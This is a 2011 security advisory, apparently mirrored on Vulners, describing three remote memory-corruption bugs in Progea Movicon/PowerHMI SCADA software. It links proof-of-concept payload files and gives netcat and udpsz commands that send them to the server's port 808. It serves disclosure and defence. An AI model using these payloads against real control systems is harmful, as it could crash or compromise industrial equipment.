Vulners
Lucene search
progea movicon / powerhmi <= 11.2.1085 - Multiple Vulnerabilities
#######################################################################
Luigi Auriemma
Application: Progea Movicon / PowerHMI
http://www.progea.com
Versions: <= 11.2.1085
Platforms: Windows
Bug: memory corruption
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: [email protected]
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
Movicon is an italian SCADA/HMI software.
#######################################################################
======
2-1) Bug
======
When the software runs a project it listens on port 808 for accepting
some HTTP requests.
The server is affected by a heap overflow caused by the usage of a
negative Content-Length field which allows to corrupt the memory
through "memcpy(heap_buffer, input, content_length_size)".
#######################################################################
===========
3-1) The Code
===========
http://aluigi.org/poc/movicon_1.dat
http://www.exploit-db.com/sploits/17842-1.dat
nc SERVER 808 < movicon_1.dat
#######################################################################
======
2-2) Bug
======
When the software runs a project it listens on port 808 for accepting
some HTTP requests.
The server is affected by a heap overflow caused by the usage of a
buffer of 8192 bytes for containing the incoming HTTP requests.
#######################################################################
===========
3-2) The Code
===========
http://aluigi.org/testz/udpsz.zip
http://www.exploit-db.com/sploits/17842-2.dat
udpsz -T -b 0x61 SERVER 808 10000
#######################################################################
======
2-3) Bug
======
When the software runs a project it listens on port 808 for accepting
some HTTP requests and on port 12233 for a particular "EIDP" protocol.
Through a too big size field in the "EIDP" packets tunnelled via the
web service (doesn't seem possible to exploit the bug via the original
port) it's possible to write a 0x00 byte in an arbitrary memory zone
higher than 0x7fffffff:
00a29001 c6041100 mov byte ptr [ecx+edx],0 ds:0023:80616161=??
This limitation could make the bug interesting only in some 64bit
environments.
#######################################################################
===========
3-3) The Code
===========
http://aluigi.org/poc/movicon_3.dat
http://www.exploit-db.com/sploits/17842-3.dat
nc SERVER 808 < movicon_3.dat
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1